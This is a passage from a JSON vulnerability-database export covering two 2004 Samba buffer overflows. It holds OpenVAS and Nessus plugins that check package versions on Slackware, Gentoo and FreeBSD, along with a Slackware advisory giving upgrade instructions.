http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"3.0.5-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200407-21.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54628", "href": "http://plugins.openvas.org/nasl.php?oid=54628", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200407-21 (Samba)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two buffer overflows vulnerabilities were found in Samba, potentially\nallowing the remote execution of arbitrary code.\";\ntag_solution = \"All Samba users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=net-fs/samba-3.0.5'\n # emerge '>=net-fs/samba-3.0.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200407-21\nhttp://bugs.gentoo.org/show_bug.cgi?id=57962\nhttp://www.samba.org/samba/whatsnew/samba-3.0.5.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200407-21.\";\n\n \n\nif(description)\n{\n script_id(54628);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200407-21 (Samba)\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-fs/samba\", unaffected: make_list(\"ge 3.0.5\"), vulnerable: make_list(\"le 3.0.4-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-29T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52420", "href": "http://plugins.openvas.org/nasl.php?oid=52420", "type": "openvas", "title": "FreeBSD Ports: samba", "sourceData": "#\n#VID 2de14f7a-dad9-11d8-b59a-00061bc2ad93\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n samba\n ja-samba\n\nCVE-2004-0600\nBuffer overflow in the Samba Web Administration Tool (SWAT) in Samba\n3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via\nan invalid base-64 character during HTTP basic authentication.\n\nCVE-2004-0686\nBuffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the\n'mangling method = hash' option is enabled in smb.conf, has unknown\nimpact and attack vectors.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52420);\n script_version(\"$Revision: 4175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-29 07:45:50 +0200 (Thu, 29 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: samba\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.samba.org/samba/whatsnew/samba-3.0.5.html\");\n script_xref(name : \"URL\" , value : \"http://www.samba.org/samba/whatsnew/samba-2.2.10.html\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12130\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/369698\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/369706\");\n script_xref(name : \"URL\" , value : \"http://www.vuxml.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"samba\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3\")>=0 && revcomp(a:bver, b:\"3.0.5,1\")<0) {\n txt += 'Package samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.10\")<0) {\n txt += 'Package samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-samba\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.10.j1.0\")<0) {\n txt += 'Package ja-samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n 
security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053922", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053922", "type": "openvas", "title": "Slackware Advisory SSA:2004-207-01 new samba packages", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_207_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53922\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-207-01 new samba packages\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-207-01\");\n\n script_tag(name:\"insight\", value:\"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK8.1\")) != NULL) {\n 
report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"3.0.5-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSun Jul 25 14:17:29 PDT 2004\npatches/packages/samba-3.0.5-i486-1.tgz: Upgraded to samba-3.0.5.\n This fixes a buffer overflow in SWAT and another in the code supporting\n the 'mangling method = hash' smb.conf option (which is not the default).\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/samba-2.2.10-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/samba-2.2.10-i386-1.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/samba-2.2.10-i486-1.tgz\n\nUpdated package for Slackware 
10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/samba-3.0.5-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-3.0.5-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\n03d53b165cf21bab6c0e26f98268d445 samba-2.2.10-i386-1.tgz\n\nSlackware 9.0 package:\n99cba95be5231d46327d3ca055a792db samba-2.2.10-i386-1.tgz\n\nSlackware 9.1 package:\n75e92332f92858430fbc01e0adf29c7b samba-2.2.10-i486-1.tgz\n\nSlackware 10.0 package:\nd4d00d9c748386da1dcd5ab941dbb294 samba-3.0.5-i486-1.tgz\n\nSlackware -current package:\nd4d00d9c748386da1dcd5ab941dbb294 samba-3.0.5-i486-1.tgz\n\n\nInstallation instructions:\n\nAs root, stop the samba server:\n\n. /etc/rc.d/rc.samba stop\n\nNext, upgrade the samba package(s) with upgradepkg:\n\nupgradepkg samba-3.0.5-i486-1.tgz\n\nFinally, start samba again:\n\n. /etc/rc.d/rc.samba start", "modified": "2004-07-25T20:24:19", "published": "2004-07-25T20:24:19", "id": "SSA-2004-207-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.407946", "type": "slackware", "title": "new samba packages", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2016-09-26T17:24:31", "description": "The following package needs to be updated: ja-samba", "edition": 1, "published": "2004-07-22T00:00:00", "type": "nessus", "title": "FreeBSD : Multiple Potential Buffer Overruns in Samba (173)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "id": "FREEBSD_SAMBA_304_4.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13656", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_2de14f7adad911d8b59a00061bc2ad93.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# 
Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(13656);\n script_version(\"$Revision: 1.17 $\");\n script_cve_id(\"CVE-2004-0686\");\n script_cve_id(\"CVE-2004-0600\");\n\n script_name(english:\"FreeBSD : Multiple Potential Buffer Overruns in Samba (173)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: ja-samba');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://secunia.com/advisories/12130\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-60.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-61.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-62.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-63.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-64.html\nhttp://www.osvdb.org/8190\nhttp://www.osvdb.org/8191\nhttp://www.samba.org/samba/whatsnew/samba-2.2.10.html\nhttp://www.samba.org/samba/whatsnew/samba-3.0.5.html');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: 
\"2004/07/22\");\n script_end_attributes();\n script_summary(english:\"Check for ja-samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37185 (freebsd_pkg_2de14f7adad911d8b59a00061bc2ad93.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=10;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"samba>3.*<3.0.5\");\n\npkg_test(pkg:\"samba>3.*,1<3.0.5,1\");\n\npkg_test(pkg:\"samba<2.2.10\");\n\npkg_test(pkg:\"ja-samba<2.2.10.j1.0\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-07T10:40:58", "description": "Evgeny Demidov discovered that the Samba server has a buffer overflow\nin the Samba Web Administration Tool (SWAT) on decoding Base64 data\nduring HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are\naffected.\n\nAnother buffer overflow bug has been found in the code used to support\nthe 'mangling method = hash' smb.conf option. The default setting for\nthis parameter is 'mangling method = hash2' and therefore not\nvulnerable. 
Versions between 2.2.0 through 2.2.9 and 3.0.0 through\n3.0.4 are affected.", "edition": 27, "published": "2009-04-23T00:00:00", "title": "FreeBSD : Multiple Potential Buffer Overruns in Samba (2de14f7a-dad9-11d8-b59a-00061bc2ad93)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-samba", "p-cpe:/a:freebsd:freebsd:samba"], "id": "FREEBSD_PKG_2DE14F7ADAD911D8B59A00061BC2AD93.NASL", "href": "https://www.tenable.com/plugins/nessus/37185", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37185);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"Secunia\", value:\"12130\");\n\n script_name(english:\"FreeBSD : Multiple Potential Buffer Overruns in Samba (2de14f7a-dad9-11d8-b59a-00061bc2ad93)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Evgeny Demidov discovered that the Samba server has a buffer overflow\nin the Samba Web Administration Tool (SWAT) on decoding Base64 data\nduring HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are\naffected.\n\nAnother buffer overflow bug has been found in the code used to support\nthe 'mangling method = hash' smb.conf option. The default setting for\nthis parameter is 'mangling method = hash2' and therefore not\nvulnerable. 
Versions between 2.2.0 through 2.2.9 and 3.0.0 through\n3.0.4 are affected.\"\n );\n # http://www.securityfocus.com/archive/1/369698\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/369698\"\n );\n # http://www.securityfocus.com/archive/1/369706\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/369706\"\n );\n # http://www.samba.org/samba/whatsnew/samba-3.0.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-3.0.5.html\"\n );\n # http://www.samba.org/samba/whatsnew/samba-2.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-2.2.10.html\"\n );\n # https://vuxml.freebsd.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78bde05c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba>3.*<3.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba>3.*,1<3.0.5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba<2.2.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-samba<2.2.10.j1.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:50", "description": "The remote host is affected by the vulnerability described in GLSA-200407-21\n(Samba: Multiple buffer overflows)\n\n Evgeny Demidov found a buffer overflow in SWAT, located in the base64 data\n decoder used to handle HTTP basic authentication (CAN-2004-0600). The same\n flaw is present in the code used to handle the sambaMungedDial attribute\n value, when using the ldapsam passdb backend. Another buffer overflow was\n found in the code used to support the 'mangling method = hash' smb.conf\n option (CAN-2004-0686). Note that the default Samba value for this option\n is 'mangling method = hash2' which is not vulnerable.\n \nImpact :\n\n The SWAT authentication overflow could be exploited to execute arbitrary\n code with the rights of the Samba daemon process. 
